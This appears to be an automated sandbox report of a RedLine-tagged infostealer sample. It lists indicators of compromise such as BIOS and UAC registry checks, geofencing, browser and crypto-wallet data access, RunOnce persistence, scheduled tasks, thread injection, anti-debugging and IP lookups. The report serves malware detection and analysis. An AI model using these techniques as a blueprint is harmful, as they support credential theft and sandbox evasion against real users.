redline | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6203035.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7574743.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2340772.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2340772.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6203035.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5436869.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5436869.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6FBB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6FBB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7574743.scr

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Sun1917b8fb5f09db8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Hahypiqidi.exe

Loads dropped DLL 38 IoCs

pid	Process
4056	setup_install.exe
4056	setup_install.exe
4056	setup_install.exe
4056	setup_install.exe
4056	setup_install.exe
4056	setup_install.exe
3148	Sun1966fb31dd5a07.tmp
2776	setup_2.tmp
5536	setup_2.tmp
5992	rundll32.exe
2956	rundll32.exe
2840	installer.exe
2840	installer.exe
2840	installer.exe
5304	MsiExec.exe
5304	MsiExec.exe
7600	rundll32.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
5732	MsiExec.exe
2840	installer.exe
5732	MsiExec.exe
5732	MsiExec.exe
5752	MsiExec.exe
5752	MsiExec.exe
5752	MsiExec.exe
5752	MsiExec.exe
5752	MsiExec.exe
5752	MsiExec.exe
5752	MsiExec.exe
5732	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/files/0x000400000001ac27-281.dat	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Laevaeqyrily.exe\""	Ze2ro.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 13 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Sun1966fb31dd5a07.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2340772.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ultramediaburner.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UltraMediaBurner.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6FBB.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Sun198361825f4.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7574743.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LivelyScreenRecF18.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6203035.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5436869.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Dapicelebae.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
120	ip-api.com
145	ipinfo.io
146	ipinfo.io

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\User_Feed_Synchronization-{51C2619E-6BAC-4F16-BCD0-83AD14025AE1}	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 501C03261A52BA4D	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4900	7574743.scr
4808	2340772.scr
5812	6203035.exe
4608	5436869.exe
6180	6FBB.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4640 set thread context of 4704	4640	5262791.scr	129
PID 5064 set thread context of 5460	5064	svchost.exe	149
PID 5936 set thread context of 5480	5936	6514043.exe	154
PID 2120 set thread context of 5428	2120	LzmwAqmV.exe	159
PID 6164 set thread context of 7016	6164	services64.exe	213

Drops file in Program Files directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe	Ze2ro.exe
File created	C:\Program Files (x86)\MSBuild\Laevaeqyrily.exe	Ze2ro.exe
File created	C:\Program Files (x86)\MSBuild\Laevaeqyrily.exe.config	Ze2ro.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe.config	Ze2ro.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-LLPBI.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-SA4OV.tmp	ultramediaburner.tmp

Drops file in Windows directory 36 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIA455.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA24F.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA62B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB350.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\474fd.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C83.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAFF1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB3CE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7D60.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA5CD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB2A3.tmp	msiexec.exe
File created	C:\Windows\Installer\47500.msi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Process not Found
File opened for modification	C:\Windows\Installer\MSI7BB6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA089.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIA35A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB206.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB97F.tmp	msiexec.exe
File created	C:\Windows\Installer\474fd.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI782A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7B28.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7D01.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB46B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C15.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB4F9.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

pid	pid_target	Process	procid_target
4916	1068	WerFault.exe	90
5208	4640	WerFault.exe	110
5488	4872	WerFault.exe	109
5480	1068	WerFault.exe	90
5828	1068	WerFault.exe	90
6012	4872	WerFault.exe	109
4732	1068	WerFault.exe	90
5804	4872	WerFault.exe	109
908	5936	WerFault.exe	145
1444	4872	WerFault.exe	109
5348	4872	WerFault.exe	109
5900	4872	WerFault.exe	109
6196	1068	WerFault.exe	90
6812	1068	WerFault.exe	90
6920	4872	WerFault.exe	109
4024	1068	WerFault.exe	90
5900	1068	WerFault.exe	90
5724	1068	WerFault.exe	90
6720	1068	WerFault.exe	90

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	setup_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	setup_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	setup_2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
7564	schtasks.exe
6568	schtasks.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
6940	taskkill.exe
8092	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\650478DC7424C37C	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "5804"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4aa813df69aed701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000050097c45d2c21b3ece630ceee51ffba610135d1f85b55c942f5add0377c80ccf636aea504dc03e506109caf8884ad0306f329d45eb77bd9381b368748cdbdce5d7cf97bb45af21481bddde93f3ee754f89e654aae67a14770f4addab4b38ef5aea5aacc28e2e6bd823fe916f9dab159fec4f486fff5e41e7c63d9d80717d0841702ab87173df97156a8cf758852157d3348e978727c4eded27aec833be4b69b6395f9bb85561473909a75c6d5bf0838a4fc172310a4a6180e5bbead1054301cc371912cfee536a744d6fa6ac33b85eb68509f1c23191811b73869d6398035cebf977d4e9295790d1c00495487819d9904d87aec79f39ab6de62d40ef112d3cd8909b993e130cdf288a86e15251b3902324590e6dfde24b0f41d2fe460e5fcf3f76a4a658d211e61ef5155bfe6e26575ff1a0ef3e9c2c07509793cea9823a48d61fb27dbe5e08ca3be9d1136c94114fbf877c7b3143b8a1100c926e373a5f0205cee494e24490610befdad240a6162283490e86005a24bcab74ee7c2bc36c1e2cc35cc46ec648a14ec950700db8d45174767404de771164f2fcb4a0bf3c31401b1c7ca7803cf70425	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEI2WPE3-XE1H-AE42-701D-DPK87XELRL76}\1 = "2302"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
